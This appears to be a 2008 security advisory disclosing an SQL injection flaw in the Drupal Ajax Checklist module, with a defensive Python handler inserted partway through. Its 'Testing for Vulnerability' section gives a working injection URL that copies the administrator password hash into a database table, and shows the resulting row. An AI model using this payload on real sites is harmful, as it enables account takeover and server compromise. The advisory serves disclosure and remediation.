drupalajax-sql.txt

25 Sep 2008, reported by Mad Irish. Type: packetstorm. Source: packetstormsecurity.com

Drupal Ajax Checklist Module SQL Injection Vulnerability

Drupal Ajax Checklist Module SQL Injection Vulnerability  
  
* Discovery Date: Sept 15, 2008  
* Security risk: high  
* Exploitable from: Remote  
* Vulnerability: SQL Injection  
* Discovered by: Justin C. Klein Keane <[email protected]>  
  
Description  
  
Drupal (http://drupal.org) is a robust content management system (CMS)  
that provides extensibility through hundreds of third party modules.  
While the security of Drupal core modules is vetted by a central  
security team, third party modules are not reviewed for security.  
  
The Ajax Checklist module (http://drupal.org/project/ajax_checklist),  
created by AsciiKewl (http://drupal.org/user/147292) is designed to  
allow users to input dynamic checklists into nodes. These checklists can  
then be checked or unchecked with state tracked via AJAX calls to pages  
that store the state in the database. Due to poor input validation on  
the AJAX handling pages, this module is vulnerable to SQL injection  
attacks. Depending on configuration, these attacks could be carried out  
by remote unauthenticated users. Due to its data-driven design, SQL  
injection attacks pose a critical threat to Drupal installations and  
their hosts and could lead to full control over the webserver process.  
  
The critical flaw exists within the ajax_checklist_save() function  
(lines 61-84 of ajax_checklist.module). This function accepts three  
parameters ($nid,$qid, and $state), all of which can be manipulated via  
a properly crafted URL. These parameters are then used to craft SQL  
select, insert, and update statements without first being sanitized.  
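
As an added defensive example (not the module's code; Python, with sqlite3 standing in for Drupal's MySQL layer), this is the shape a hardened ajax_checklist_save() handler should take: the three path segments are accepted only as plain integers and then bound as query parameters in the same select/update/insert sequence the advisory describes. The uid argument stands for the logged-in user, and the path layout, schema and status codes are assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the module's ajax_checklist table; column names follow the advisory's dump.
SCHEMA = "CREATE TABLE ajax_checklist (nid INTEGER, user INTEGER, qid INTEGER, state INTEGER)"
PLAIN_INT = re.compile(r"[0-9]+")

def new_db():
    """In-memory SQLite database with the checklist table (sqlite3 stands in for Drupal's MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn

def parse_save_path(path):
    """Split /ajaxchecklist/save/<nid>/<qid>/<state> into ints; None if any segment is not a
    plain non-negative integer, so a quote, comma or parenthesis never reaches the SQL layer."""
    parts = unquote(path).strip("/").split("/")
    if len(parts) != 5 or parts[:2] != ["ajaxchecklist", "save"]:
        return None
    if not all(PLAIN_INT.fullmatch(seg) for seg in parts[2:]):
        return None
    return tuple(int(seg) for seg in parts[2:])

def save_state(conn, uid, nid, qid, state):
    """The select/update/insert sequence the advisory describes, with every value bound as a parameter."""
    exists = conn.execute("SELECT COUNT(*) FROM ajax_checklist WHERE nid = ? AND user = ? AND qid = ?",
                          (nid, uid, qid)).fetchone()[0]
    if exists:
        conn.execute("UPDATE ajax_checklist SET state = ? WHERE nid = ? AND user = ? AND qid = ?",
                     (state, nid, uid, qid))
    else:
        conn.execute("INSERT INTO ajax_checklist (nid, user, qid, state) VALUES (?, ?, ?, ?)",
                     (nid, uid, qid, state))
    conn.commit()

def handle_save(conn, uid, path):
    """HTTP status a hardened handler would answer: 400 for a malformed path, 200 after saving."""
    args = parse_save_path(path)
    if args is None:
        return 400
    save_state(conn, uid, *args)
    return 200

def checklist_rows(conn):
    return conn.execute("SELECT nid, user, qid, state FROM ajax_checklist ORDER BY nid, qid").fetchall()

if __name__ == "__main__":
    db = new_db()
    print(handle_save(db, 7, "/ajaxchecklist/save/1/2/1"), checklist_rows(db))  # 200 [(1, 7, 2, 1)]
    print(handle_save(db, 7, "/ajaxchecklist/save/1/2%27,2),(3/4"), checklist_rows(db))  # 400, unchanged
```
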
  
Vulnerable Versions  
  
5.x-1.0 dated 2007-Aug-18 was tested and shown vulnerable.  
  
Testing for Vulnerability  
  
Calling the URL:  
  
http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4  
  
will cause the administrator password to be inserted into the  
ajax_checkbox table in the Drupal database:  
  
mysql> select * from ajax_checklist;  
+-----+------+----------------------------------+-------+  
| nid | user | qid                              | state |  
+-----+------+----------------------------------+-------+  
|   1 |    0 | 2                                |     2 |  
|   3 |    3 | 4202b5f87a68583e20aae6917c8c33d1 |     3 |  
|   4 |    4 | 4                                |     3 |  
+-----+------+----------------------------------+-------+  
  
Impact  
  
Highly critical. Depending on configuration, this vulnerability could  
allow attackers to compromise the Drupal administrator account, an  
attack that can lead to web server and even host compromise since the  
administrator can configure file uploads and alter any content on the  
Drupal installation.  
  
Determining Version  
  
The ajax_checklist.info page for vulnerable versions displays the  
following information:  
  
; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $  
name = Ajax Checklist  
description = Creates filter-driven checklists with ajax updating to the database  
package = Other  
version = 5.x-0.1  
  
; Information added by drupal.org packaging script on 2007-08-18  
version = "5.x-1.0"  
project = "ajax_checklist"  
datestamp = "1187416501"  
  
Determining version information on Drupal sites is trivial in many cases  
(ref http://www.madirish.net/?article=214).  
  
Vendor Response  
  
Drupal security team contacted September 17, 2008. A security patch and  
announcement should be available Wednesday September 24, 2008.  
  
--  
  
Justin C. Klein Keane  
http://www.MadIrish.net  
